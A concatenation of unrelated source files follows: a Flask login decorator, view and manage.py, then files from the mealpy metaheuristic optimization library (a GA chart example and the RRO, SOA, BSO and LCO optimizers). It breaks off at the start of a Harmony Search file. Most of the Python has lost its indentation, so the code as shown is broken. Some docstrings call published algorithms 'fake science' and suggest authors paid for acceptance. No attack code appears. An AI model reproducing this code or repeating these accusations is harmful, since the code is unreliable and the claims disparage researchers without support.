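# Quick sanity examples for check_mobile: check_mobile("13812345678") -> True,
# check_mobile("12012345678") -> False (the second digit must be 3-9), check_mobile(None) -> False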
# Define a login decorator that attaches the logged-in user's data to the request context
def user_login_data(view_func):
    @wraps(view_func)
    def wrapper(*args, **kwargs):
        # 1. Get the user_id from the session
        user_id = session.get("user_id")
        # 2. Load the user object by user_id
        user = None
        if user_id:
            try:
                from app.models import User
                user = User.query.get(user_id)
            except Exception as e:
                current_app.logger.error(e)
        # 3. Attach the user object to g
        g.user = user
        return view_func(*args, **kwargs)
    return wrapper
```
#### File: app/main/views.py
```python
from flask import render_template
from flask_login import current_user
from ..main import main
@main.route('/',methods = ['GET'])
def index():
print(current_user.is_authenticated)
return render_template("site/index.html")
```
#### File: JokerHai/ihome/manage.py
```python
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager, Shell
from app import create_app, db, models
from app.models import User,Area,House,Facility,HouseImage, Order
app = create_app('default')
manager = Manager(app)
migrate = Migrate(app, db)
def make_shell_context():
return dict(app=app, db=db,
User=User,Area=Area,
House=House,Facility=Facility,
HouseImage=HouseImage,
Order=Order
)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
``` |
{
"source": "JokerHB/mealpy",
"score": 3
} |
#### File: utils/visualize/exploration_exploitation_chart.py
```python
from mealpy.evolutionary_based.GA import BaseGA
from mealpy.utils.visualize import *
from numpy import sum, mean, sqrt
## Define your own fitness function
# Multi-objective problem with a single fitness/target value: a weighting method converts the multiple objectives into one scalar target
def obj_function(solution):
f1 = (sum(solution ** 2) - mean(solution)) / len(solution)
f2 = sum(sqrt(abs(solution)))
f3 = sum(mean(solution ** 2) - solution)
return [f1, f2, f3]
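# With obj_weight=[0.2, 0.5, 0.3] passed to the optimizer below, the three objectives are
# presumably collapsed into a single scalar fitness of 0.2*f1 + 0.5*f2 + 0.3*f3 (the weighting
# method mentioned above).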
## Setting parameters
verbose = True
epoch = 100
pop_size = 50
lb1 = [-10, -5, -15, -20, -10, -15, -10, -30]
ub1 = [10, 5, 15, 20, 50, 30, 100, 85]
optimizer = BaseGA(obj_function, lb1, ub1, "min", verbose, epoch, pop_size, obj_weight=[0.2, 0.5, 0.3])
best_position, best_fitness, g_best_fit_list, c_best_fit_list = optimizer.train()
print(best_position)
## On the exploration and exploitation in popular swarm-based metaheuristic algorithms (the idea comes from this paper)
# This exploration/exploitation chart should be drawn for a single algorithm and a single fitness function
export_explore_exploit_chart([optimizer.history_list_explore, optimizer.history_list_exploit]) # Draw exploration and exploitation chart
# Parameter for this function
# data: is the list of array
# + optimizer.history_list_explore -> List of exploration percentages
# + optimizer.history_list_exploit -> List of exploitation percentages
# title: title of the figure
# list_legends: list of line's name, default = ("Exploration %", "Exploitation %")
# list_styles: matplotlib API, default = ('-', '-')
# list_colors: matplotlib API, default = ('blue', 'orange')
# x_label: string, default = "#Iteration"
# y_label: string, default = "Percentage"
# filename: string, default = "explore_exploit_chart"
# exts: matplotlib API, default = (".png", ".pdf") --> save figure in format of png and pdf
# verbose: show the figure on Python IDE, default = True
# This diversity chart should be drawn for multiple algorithms on a single fitness function at the same time to compare the diversity spreading
export_diversity_chart([optimizer.history_list_div], list_legends=['GA']) # Draw diversity measurement chart
# Parameter for this function
# data: is the list of array
# + optimizer1.history_list_div -> List of diversity spreading for this optimizer1
#       + optimizer2.history_list_div -> List of diversity spreading for this optimizer2
# title: title of the figure
# list_legends: list, e.g. ("GA", "PSO",..)
# list_styles: matplotlib API, default = None
# list_colors: matplotlib API, default = None
# x_label: string, default = "#Iteration"
# y_label: string, default = "Diversity Measurement"
# filename: string, default = "diversity_chart"
# exts: matplotlib API, default = (".png", ".pdf") --> save figure in format of png and pdf
# verbose: show the figure on Python IDE, default = True
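# A hedged usage sketch with explicit keyword arguments (parameter names taken from the comments
# above; "optimizer2" is a hypothetical second optimizer run on the same problem):
# export_explore_exploit_chart([optimizer.history_list_explore, optimizer.history_list_exploit],
#                              title="GA exploration vs exploitation", filename="ga_explore_exploit", verbose=False)
# export_diversity_chart([optimizer.history_list_div, optimizer2.history_list_div],
#                        list_legends=['GA', 'GA-run2'], filename="ga_diversity", verbose=False)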
```
#### File: mealpy/dummy/RRO.py
```python
from numpy.random import uniform, rand, choice
from numpy import zeros, power
from copy import deepcopy
from mealpy.optimizer import Root
class OriginalRRO(Root):
"""
The original version of: Raven Roosting Optimization (RRO)
Link:
https://doi.org/10.1007/s00500-014-1520-5
Questions:
1. How to set the value of R? I guess R = (UB - LB) / 2
        2. How to handle the case where a raven flies outside of the radius? I guess redo the flight from the previous position.
        3. How to select the Perception Follower? I guess it is randomly selected.
        4. The pseudo-code is wrong, 100%. After each iteration, create N random locations. For real?
        5. The sentence "There is a Prob_stop chance the raven will stop": what is Prob_stop? It is not mentioned.
        6. The whole paper contains only one simple equation: x(t) = x(t-1) + d. Really?
Conclusion:
The algorithm can't even converge for a simple problem (sphere function).
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
r_perception=3.6, r_leader=3.6, n_steps=20, weak_percent=0.4, prob_stop=0.2, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
        self.r_perception = r_perception  # Default: [1.8, 3.6], factor that controls the radius of perception
        self.r_leader = r_leader  # Default: [1.8, 3.6], factor that controls the radius of the leader
        self.n_steps = n_steps  # Default: [5, 10, 20], number of moving steps of each raven towards the best solution
        self.weak_percent = weak_percent  # Default: [0.2, 0.4, 0.6], percentage of the population moved towards the global best solution
self.prob_stop = prob_stop # The probability of stopping the fly
def train(self):
r_percept = ((self.ub - self.lb)/ 2) / (self.r_perception * power(self.pop_size, 1.0 / self.problem_size))
r_leader = ((self.ub - self.lb) / 2) / (self.r_leader * power(self.pop_size, 1.0 / self.problem_size))
n_ravens = int(self.weak_percent * self.pop_size)
pop = [self.create_solution() for _ in range(self.pop_size)]
pop_local = deepcopy(pop)
g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
for epoch in range(self.epoch):
# Select the random raven to fly to global best by r_leader
idx_list = choice(range(0, self.pop_size), n_ravens, replace=False)
for i in range(self.pop_size):
if i in idx_list: # Fly to global best
step = 0
while step < self.n_steps:
d_random = uniform(zeros(self.problem_size), r_leader, self.problem_size)
pos_new = pop[i][self.ID_POS] + d_random
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
if rand() < self.prob_stop: # If probability stop fly occur, then stop it, or else move on
break
step += 1
pop[i] = [pos_new, fit_new]
else: # Fly to personal best
step = 0
while step < self.n_steps:
d_random = uniform(zeros(self.problem_size), r_percept, self.problem_size)
pos_new = pop[i][self.ID_POS] + d_random
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
if rand() < self.prob_stop:
break
step += 1
pop[i] = [pos_new, fit_new]
g_best = self.update_global_best_solution(pop_local, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class IRRO(Root):
"""
The original version of: Improved Raven Roosting Optimization (IRRO)
Link:
https://doi.org/10.1016/j.swevo.2017.11.006
Questions:
        0. HOW? REALLY? How can this paper be accepted at such a strict journal? I DON'T GET IT.
            This is not science; this is what people would call "pseudo-science" or "fake science".
        1. Like the code above, RRO is a fake algorithm, so why would someone try to improve it?
        2. And of course, because it is a fake algorithm, a single simple equation is enough to "improve" it.
        3. What is the contribution of this paper that got it accepted in this journal?
        4. Where is Algorithm 2? (OMG, did the reviewers not see that it is missing?)
    Conclusion:
        How much money do you have to pay to get accepted in this journal?
        Please send me your code; if I'm wrong, I will publicly apologize.
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
r_perception=3.6, r_leader=3.6, n_steps=20, weak_percent=0.4, food_max=1, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
        self.r_perception = r_perception  # Default: [1.8, 3.6], factor that controls the radius of perception
        self.r_leader = r_leader  # Default: [1.8, 3.6], factor that controls the radius of the leader
        self.n_steps = n_steps  # Default: [5, 10, 20], number of moving steps of each raven towards the best solution
        self.weak_percent = weak_percent  # Default: [0.2, 0.4, 0.6], percentage of the population moved towards the global best solution
self.food_max = food_max
def train(self):
r_percept = ((self.ub - self.lb) / 2) / (self.r_perception * power(self.pop_size, 1.0 / self.problem_size))
r_leader = ((self.ub - self.lb) / 2) / (self.r_leader * power(self.pop_size, 1.0 / self.problem_size))
n_ravens = self.pop_size - int(self.weak_percent * self.pop_size) # Number of greedy ravens
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
pop_local = deepcopy(pop)
for epoch in range(self.epoch):
# Calculate the food <-- The probability stopping of the fly
food_st = self.food_max * (self.epoch - epoch) / (self.epoch)
for i in range(self.pop_size):
if i < n_ravens: # Fly to global best
step = 0
while step < self.n_steps:
d_random = uniform(zeros(self.problem_size), r_leader, self.problem_size)
pos_new = pop[i][self.ID_POS] + d_random
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
if rand() < food_st:
break
step += 1
pop[i] = [pos_new, fit_new]
else: # Fly to personal best
step = 0
while step < self.n_steps:
d_random = uniform(zeros(self.problem_size), r_percept, self.problem_size)
pos_new = pop[i][self.ID_POS] + d_random
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
if rand() < food_st:
break
step += 1
pop[i] = [pos_new, fit_new]
pop_idx = list(range(0, self.pop_size))
pop_fit = [item[self.ID_FIT] for item in pop_local]
zipped_pop = zip(pop_fit, pop_idx)
zipped_pop = sorted(zipped_pop)
pop1, pop_local1 = deepcopy(pop), deepcopy(pop_local)
for i, (fit, idx) in enumerate(zipped_pop):
pop[i] = pop1[idx]
pop_local[i] = pop_local1[idx]
if pop_local[0][self.ID_FIT] < g_best[self.ID_FIT]:
g_best = deepcopy(pop_local[0])
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class BaseRRO(Root):
"""
My developed version: Raven Roosting Optimization (RRO)
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
n_steps=10, weak_percent=0.4, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
self.n_steps = n_steps # Default: [5, 10, 20], Number of moving steps of each raven towards the best solution
        self.weak_percent = weak_percent  # Default: [0.2, 0.4, 0.6], percentage of the population moved towards the global best solution
def train(self):
n_ravens = self.pop_size - int(self.weak_percent * self.pop_size) # Number of greedy ravens
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
pop_local = deepcopy(pop)
for epoch in range(self.epoch):
for i in range(self.pop_size):
if i < n_ravens: # Fly to global best
step = 0
while step < self.n_steps:
pos_new = g_best[self.ID_POS] + uniform() * (g_best[self.ID_POS] - pop[i][self.ID_POS])
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
break
step += 1
pop[i] = [pos_new, fit_new]
else: # Fly to personal best
step = 0
while step < self.n_steps:
pos_new = pop_local[i][self.ID_POS] + uniform() * (pop_local[i][self.ID_POS] - pop[i][self.ID_POS])
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
break
step += 1
pop[i] = [pos_new, fit_new]
pop_idx = list(range(0, self.pop_size))
pop_fit = [item[self.ID_FIT] for item in pop_local]
zipped_pop = zip(pop_fit, pop_idx)
zipped_pop = sorted(zipped_pop)
pop1, pop_local1 = deepcopy(pop), deepcopy(pop_local)
for i, (fit, idx) in enumerate(zipped_pop):
pop[i] = pop1[idx]
pop_local[i] = pop_local1[idx]
if pop_local[0][self.ID_FIT] < g_best[self.ID_FIT]:
g_best = deepcopy(pop_local[0])
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
```
#### File: mealpy/dummy/SOA.py
```python
from numpy import pi, exp, cos, sin
from numpy.random import uniform
from mealpy.optimizer import Root
class BaseSOA(Root):
"""
My modified version of: Sandpiper Optimization Algorithm (SOA)
Notes:
+ I changed some equations and the flow of algorithm
+ Remember this paper and algorithm is dummy
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
C_f = 1.0
# Epoch loop
for epoch in range(self.epoch):
## Each individual loop
for i in range(self.pop_size):
### Based on Eq.5, 6, 7, 8, 9
C_sp = (C_f - epoch * (C_f/self.epoch)) * pop[i][self.ID_POS]
M_sp = uniform() * ( g_best[self.ID_POS] - pop[i][self.ID_POS] )
D_sp = C_sp + M_sp
### Based on Eq. 10, 11, 12, 13, 14
r = exp(uniform(0, 2*pi))
temp = r * (sin(uniform(0, 2*pi)) + cos(uniform(0, 2*pi)) + uniform(0, 2*pi))
P_sp = (D_sp * temp) * g_best[self.ID_POS]
P_sp = self.amend_position_faster(P_sp)
fit = self.get_fitness_position(P_sp)
if fit < pop[i][self.ID_FIT]:
pop[i] = [P_sp, fit]
if fit < g_best[self.ID_FIT]:
g_best = [P_sp, fit]
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print("Epoch: {}, Best fit: {}".format(epoch+1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class OriginalSOA(BaseSOA):
"""
The original version of: Sandpiper Optimization Algorithm (SOA)
(Sandpiper optimization algorithm: a novel approach for solving real-life engineering problems or
A bio-inspired based optimization algorithm for industrial engineering problems.)
Notes:
        + This algorithm is trash; it is unethical to submit the same paper to 2 journals.
+ Can't even update its position.
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100, **kwargs):
BaseSOA.__init__(self, obj_func, lb, ub, verbose, epoch, pop_size, kwargs=kwargs)
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
C_f = 2
# Epoch loop
for epoch in range(self.epoch):
## Each individual loop
for i in range(self.pop_size):
### Based on Eq.5, 6, 7, 8, 9
C_sp = (C_f - epoch * (C_f / self.epoch)) * pop[i][self.ID_POS]
M_sp = 0.5 * uniform() * ( g_best[self.ID_POS] - pop[i][self.ID_POS] )
D_sp = C_sp + M_sp
### Based on Eq. 10, 11, 12, 13, 14
r = exp(uniform(0, 2*pi))
temp = r * (sin(uniform(0, 2*pi)) + cos(uniform(0, 2*pi)) + uniform(0, 2*pi))
P_sp = (D_sp * temp) * g_best[self.ID_POS]
fit = self.get_fitness_position(P_sp)
pop[i] = [P_sp, fit]
if fit < g_best[self.ID_FIT]:
g_best = [P_sp, fit]
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print("Epoch: {}, Best fit: {}".format(epoch+1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
```
#### File: mealpy/human_based/BSO.py
```python
import numpy as np
from copy import deepcopy
from mealpy.optimizer import Optimizer
class ImprovedBSO(Optimizer):
"""
My improved version of: Brain Storm Optimization (BSO)
(Brain storm optimization algorithm)
Notes:
        + Some parameters and equations are not needed
        + Using levy-flight to make it more robust
"""
def __init__(self, problem, epoch=10000, pop_size=100,
m_clusters=5, p1=0.25, p2=0.5, p3=0.75, p4=0.5, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
m_clusters (): number of clusters (m in the paper)
            p1 (float): probability of replacing a randomly chosen cluster center with a new random solution, default = 0.25
            p2 (float): 50% chance the change comes from the individual itself (local search), 50% from outside (global search)
            p3 (float): 75% chance to develop the old idea, 25% chance to invent a new idea based on levy-flight
            p4 (float): puts more weight on the cluster centers instead of random positions
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.m_clusters = m_clusters
self.p1 = p1
self.p2 = p2
self.p3 = p3
self.p4 = p4
self.m_solution = int(self.pop_size / self.m_clusters)
self.pop_group, self.centers = None, None
def _find_cluster(self, pop_group):
centers = []
for i in range(0, self.m_clusters):
_, local_best = self.get_global_best_solution(pop_group[i])
centers.append(deepcopy(local_best))
return centers
def _make_group(self, pop):
pop_group = []
for idx in range(0, self.m_clusters):
pop_group.append(deepcopy(pop[idx * self.m_solution:(idx + 1) * self.m_solution]))
return pop_group
def initialization(self):
self.pop = self.create_population(self.pop_size)
self.pop_group = self._make_group(self.pop)
self.centers = self._find_cluster(self.pop_group)
_, self.g_best = self.get_global_best_solution(self.pop)
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
epxilon = 1 - 1 * (epoch + 1) / self.epoch # 1. Changed here, no need: k
if np.random.uniform() < self.p1: # p_5a
idx = np.random.randint(0, self.m_clusters)
solution_new = self.create_solution()
self.centers[idx] = solution_new
pop_group = deepcopy(self.pop_group)
for i in range(0, self.pop_size): # Generate new individuals
cluster_id = int(i / self.m_solution)
location_id = int(i % self.m_solution)
if np.random.uniform() < self.p2: # p_6b
if np.random.uniform() < self.p3:
pos_new = self.centers[cluster_id][self.ID_POS] + epxilon * np.random.uniform()
else: # 2. Using levy flight here
levy_step = self.get_levy_flight_step(beta=1.0, multiplier=0.001, case=-1)
pos_new = self.pop_group[cluster_id][location_id][self.ID_POS] + np.random.normal(0, 1, self.problem.n_dims) * levy_step
else:
id1, id2 = np.random.choice(range(0, self.m_clusters), 2, replace=False)
if np.random.uniform() < self.p4:
pos_new = 0.5 * (self.centers[id1][self.ID_POS] + self.centers[id2][self.ID_POS]) + epxilon * np.random.uniform()
else:
rand_id1 = np.random.randint(0, self.m_solution)
rand_id2 = np.random.randint(0, self.m_solution)
pos_new = 0.5 * (self.pop_group[id1][rand_id1][self.ID_POS] + self.pop_group[id2][rand_id2][self.ID_POS]) + \
epxilon * np.random.uniform()
pos_new = self.amend_position_random(pos_new)
pop_group[cluster_id][location_id] = [pos_new, None]
pop_group = [self.update_fitness_population(group) for group in pop_group]
for idx in range(0, self.m_clusters):
self.pop_group[idx] = self.greedy_selection_population(self.pop_group[idx], pop_group[idx])
# Needed to update the centers and population
self.centers = self._find_cluster(self.pop_group)
self.pop = []
for idx in range(0, self.m_clusters):
self.pop += self.pop_group[idx]
class BaseBSO(ImprovedBSO):
"""
The original version of: Brain Storm Optimization (BSO)
(Brain storm optimization algorithm)
Link:
DOI: https://doi.org/10.1007/978-3-642-21515-5_36
"""
def __init__(self, problem, epoch=10000, pop_size=100,
m_clusters=5, p1=0.2, p2=0.8, p3=0.4, p4=0.5, slope=20, miu=0, xichma=1, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
m_clusters (int): number of clusters (m in the paper)
p1 (float): probability
p2 (float): probability
p3 (float): probability
p4 (float): probability
slope (int): changing logsig() function's slope (k: in the paper)
miu (float):
xichma (float):
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, m_clusters, p1, p2, p3, p4, **kwargs)
self.slope = slope
self.miu = miu
self.xichma = xichma
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
x = (0.5 * self.epoch - (epoch + 1)) / self.slope
epxilon = np.random.uniform() * (1 / (1 + np.exp(-x)))
if np.random.rand() < self.p1: # p_5a
idx = np.random.randint(0, self.m_clusters)
solution_new = self.create_solution()
self.centers[idx] = solution_new
pop_group = deepcopy(self.pop_group)
for i in range(0, self.pop_size): # Generate new individuals
cluster_id = int(i / self.m_solution)
location_id = int(i % self.m_solution)
if np.random.uniform() < self.p2: # p_6b
if np.random.uniform() < self.p3: # p_6i
cluster_id = np.random.randint(0, self.m_clusters)
if np.random.uniform() < self.p3:
pos_new = self.centers[cluster_id][self.ID_POS] + epxilon * np.random.normal(self.miu, self.xichma)
else:
rand_idx = np.random.randint(0, self.m_solution)
pos_new = self.pop_group[cluster_id][rand_idx][self.ID_POS] + np.random.uniform()
else:
id1, id2 = np.random.choice(range(0, self.m_clusters), 2, replace=False)
if np.random.uniform() < self.p4:
pos_new = 0.5 * (self.centers[id1][self.ID_POS] + self.centers[id2][self.ID_POS]) + \
epxilon * np.random.normal(self.miu, self.xichma)
else:
rand_id1 = np.random.randint(0, self.m_solution)
rand_id2 = np.random.randint(0, self.m_solution)
pos_new = 0.5 * (self.pop_group[id1][rand_id1][self.ID_POS] + self.pop_group[id2][rand_id2][self.ID_POS]) + \
epxilon * np.random.normal(self.miu, self.xichma)
pos_new = self.amend_position_random(pos_new)
pop_group[cluster_id][location_id] = [pos_new, None]
pop_group = [self.update_fitness_population(group) for group in pop_group]
for idx in range(0, self.m_clusters):
self.pop_group[idx] = self.greedy_selection_population(self.pop_group[idx], pop_group[idx])
# Needed to update the centers and population
self.centers = self._find_cluster(self.pop_group)
self.pop = []
for idx in range(0, self.m_clusters):
self.pop += self.pop_group[idx]
```
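A minimal usage sketch for the two BSO variants above, assuming the problem-dictionary format documented in `mealpy/optimizer.py` further below (`obj_func`, `lb`, `ub`, `minmax`, `verbose`). The import path, the sphere objective and every parameter value here are illustrative assumptions, not values prescribed by the library.
```python
import numpy as np
from mealpy.human_based.BSO import BaseBSO  # assumed import path; adjust to where BaseBSO is defined

def sphere(solution):
    # Convex test function with its global minimum 0 at the origin
    return np.sum(solution ** 2)

problem = {
    "obj_func": sphere,
    "lb": [-10] * 20,
    "ub": [10] * 20,
    "minmax": "min",
    "verbose": False,
}

# 50 solutions split across 5 clusters (10 solutions per cluster)
model = BaseBSO(problem, epoch=100, pop_size=50, m_clusters=5)
best_position, best_fitness = model.solve()
print(best_position, best_fitness)
```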
#### File: mealpy/human_based/LCO.py
```python
import numpy as np
from copy import deepcopy
from mealpy.optimizer import Optimizer
class OriginalLCO(Optimizer):
"""
The original version of: Life Choice-based Optimization (LCO)
(A novel life choice-based optimizer)
Link:
DOI: https://doi.org/10.1007/s00500-019-04443-z
"""
def __init__(self, problem, epoch=10000, pop_size=100, r1=2.35, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
r1 (float): coefficient factor
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = True
self.epoch = epoch
self.pop_size = pop_size
self.r1 = r1
self.n_agents = int(np.ceil(np.sqrt(self.pop_size)))
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
pop_new = []
for i in range(0, self.pop_size):
rand_number = np.random.random()
if rand_number > 0.875: # Update using Eq. 1, update from n best position
temp = np.array([np.random.random() * self.pop[j][self.ID_POS] for j in range(0, self.n_agents)])
temp = np.mean(temp, axis=0)
elif rand_number < 0.7: # Update using Eq. 2-6
f1 = 1 - epoch / self.epoch
f2 = 1 - f1
if i == 0:
pop_new.append(deepcopy(self.g_best))
continue
else:
best_diff = f1 * self.r1 * (self.g_best[self.ID_POS] - self.pop[i][self.ID_POS])
better_diff = f2 * self.r1 * (self.pop[i - 1][self.ID_POS] - self.pop[i][self.ID_POS])
temp = self.pop[i][self.ID_POS] + np.random.random() * better_diff + np.random.random() * best_diff
else:
temp = self.problem.ub - (self.pop[i][self.ID_POS] - self.problem.lb) * np.random.random()
pos_new = self.amend_position_faster(temp)
pop_new.append([pos_new, None])
self.pop = self.update_fitness_population(pop_new)
class BaseLCO(OriginalLCO):
"""
My base version of: Life Choice-based Optimization (LCO)
(A novel life choice-based optimizer)
Link:
DOI: https://doi.org/10.1007/s00500-019-04443-z
"""
def __init__(self, problem, epoch=10000, pop_size=100, r1=2.35, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
r1 (float): coefficient factor
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, r1, **kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = True
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
# epoch: current chance, self.epoch: number of chances
pop_new = []
for i in range(0, self.pop_size):
rand = np.random.random()
if rand > 0.875: # Update using Eq. 1, update from n best position
temp = np.array([np.random.random() * self.pop[j][self.ID_POS] for j in range(0, self.n_agents)])
temp = np.mean(temp, axis=0)
elif rand < 0.7: # Update using Eq. 2-6
f = (epoch + 1) / self.epoch
if i != 0:
better_diff = f * self.r1 * (self.pop[i - 1][self.ID_POS] - self.pop[i][self.ID_POS])
else:
better_diff = f * self.r1 * (self.g_best[self.ID_POS] - self.pop[i][self.ID_POS])
best_diff = (1 - f) * self.r1 * (self.pop[0][self.ID_POS] - self.pop[i][self.ID_POS])
temp = self.pop[i][self.ID_POS] + np.random.uniform() * better_diff + np.random.uniform() * best_diff
else:
temp = self.problem.ub - (self.pop[i][self.ID_POS] - self.problem.lb) * np.random.uniform(self.problem.lb, self.problem.ub)
pos_new = self.amend_position_faster(temp)
pop_new.append([pos_new, None])
self.pop = self.update_fitness_population(pop_new)
class ImprovedLCO(Optimizer):
"""
The improved version of: Life Choice-Based Optimization (LCO) based on
+ Gaussian distribution
+ Mutation Mechanism
"""
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = 2 * pop_size
self.sort_flag = True
self.epoch = epoch
self.pop_size = pop_size
self.pop_len = int(self.pop_size / 2)
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
# epoch: current chance, self.epoch: number of chances
pop_new = []
for i in range(0, self.pop_size):
rand = np.random.random()
if rand > 0.875: # Update using Eq. 1, update from n best position
n = int(np.ceil(np.sqrt(self.pop_size)))
pos_new = np.array([np.random.uniform() * self.pop[j][self.ID_POS] for j in range(0, n)])
pos_new = np.mean(pos_new, axis=0)
elif rand < 0.7: # Update using Eq. 2-6
f = (epoch + 1) / self.epoch
if i != 0:
better_diff = f * np.random.uniform() * (self.pop[i - 1][self.ID_POS] - self.pop[i][self.ID_POS])
else:
better_diff = f * np.random.uniform() * (self.g_best[self.ID_POS] - self.pop[i][self.ID_POS])
best_diff = (1 - f) * np.random.uniform() * (self.pop[0][self.ID_POS] - self.pop[i][self.ID_POS])
pos_new = self.pop[i][self.ID_POS] + better_diff + best_diff
else:
pos_new = self.problem.ub - (self.pop[i][self.ID_POS] - self.problem.lb) * np.random.uniform(self.problem.lb, self.problem.ub)
pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
## Sort the updated population based on fitness
pop, local_best = self.get_global_best_solution(pop_new)
pop_s1, pop_s2 = pop[:self.pop_len], pop[self.pop_len:]
## Mutation scheme
for i in range(0, self.pop_len):
pos_new = pop_s1[i][self.ID_POS] * (1 + np.random.normal(0, 1, self.problem.n_dims))
pop_s1[i][self.ID_POS] = self.amend_position_faster(pos_new)
pop_s1 = self.update_fitness_population(pop_s1)
## Search Mechanism
pos_s1_list = [item[self.ID_POS] for item in pop_s1]
pos_s1_mean = np.mean(pos_s1_list, axis=0)
for i in range(0, self.pop_len):
pos_new = (local_best[self.ID_POS] - pos_s1_mean) - np.random.random() * \
(self.problem.lb + np.random.random() * (self.problem.ub - self.problem.lb))
            pop_s2[i][self.ID_POS] = self.amend_position_faster(pos_new)
pop_s2 = self.update_fitness_population(pop_s2)
## Construct a new population
self.pop = pop_s1 + pop_s2
```
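A standalone NumPy sketch of the Eq. 1 branch shared by the three LCO variants above: the new position is the mean of the n best agents, each scaled by its own random coefficient. The population is assumed to be sorted best-first (sort_flag=True in the classes above); the sizes and bounds are illustrative.
```python
import numpy as np

np.random.seed(0)
pop_size, n_dims = 10, 5
n_agents = int(np.ceil(np.sqrt(pop_size)))   # number of best agents used in Eq. 1

# Stand-in for a population already sorted best-first
positions = np.random.uniform(-10, 10, (pop_size, n_dims))

# Eq. 1: each of the n best positions gets its own random factor, then they are averaged
scaled = np.random.random((n_agents, 1)) * positions[:n_agents]
pos_new = np.mean(scaled, axis=0)
print(pos_new)
```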
#### File: mealpy/music_based/HS.py
```python
import numpy as np
from mealpy.optimizer import Optimizer
class BaseHS(Optimizer):
"""
My version of: Harmony Search (HS)
Noted:
- Using global best in the harmony memories
- Remove third for loop
